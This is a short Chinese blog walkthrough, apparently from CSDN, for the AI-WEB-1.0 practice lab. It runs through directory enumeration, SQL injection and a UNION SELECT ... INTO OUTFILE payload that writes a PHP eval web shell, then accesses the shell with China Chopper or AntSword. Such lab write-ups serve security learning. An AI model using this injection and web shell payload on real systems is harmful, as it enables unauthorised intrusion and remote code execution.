CSDN AI-WEB-1.0 攻略

找到一个目标靶场的IP , 这里以172.16.1.98 为例

1、使用命令 /robots.txt 来确定目录

2、分别测试两个文件

均无法访问,可返回其根目录查询

3、到根目录,出现搜索框

4、输入ID为1

5、使用虚拟机kali的终端

搜索命令 dirsearch -u http://172.16.1.98/m3diNf0/

6、搜索文件 info.php

即可得到 WWW 所在的根目录

7、确定闭合方式 1'

8、确定字段

1' order by 3#

9、注入一句话"木马"

1' union select 1,2 ,'<?php @eval($_POST['cmd']);?>' into outfile '绝对路径' #

9、查看文件,木马是否注入成功

搜索 /s /up /sis.php

10、使用中国蚁键/中国菜刀等工具,进入该系统

++即可成功获取信息++

安全

网络安全人人有责,切勿知法犯法

相关推荐
行云流水剑2 小时前
【学习记录】使用 Kali Linux 与 Hashcat 进行 WiFi 安全分析:合法的安全测试指南
linux·学习·安全
持久的棒棒君2 小时前
npm安装electron下载太慢,导致报错
前端·electron·npm
KKKlucifer2 小时前
加密通信 + 行为分析:运营商行业安全防御体系重构
网络·安全·重构
why1513 小时前
微服务商城-商品微服务
数据库·后端·golang
炎码工坊3 小时前
微服务通信安全实战:JWT在分布式架构中的应用与最佳实践
安全·网络安全·云原生·系统安全·安全架构
柒间3 小时前
Elasticsearch 常用操作命令整合 (cURL 版本)
大数据·数据库·elasticsearch
crary,记忆4 小时前
Angular微前端架构:Module Federation + ngx-build-plus (Webpack)
前端·webpack·angular·angular.js
漂流瓶jz4 小时前
让数据"流动"起来!Node.js实现流式渲染/流式传输与背后的HTTP原理
前端·javascript·node.js
achene_ql4 小时前
select、poll、epoll 与 Reactor 模式
linux·服务器·网络·c++
SamHou05 小时前
手把手 CSS 盒子模型——从零开始的奶奶级 Web 开发教程2
前端·css·web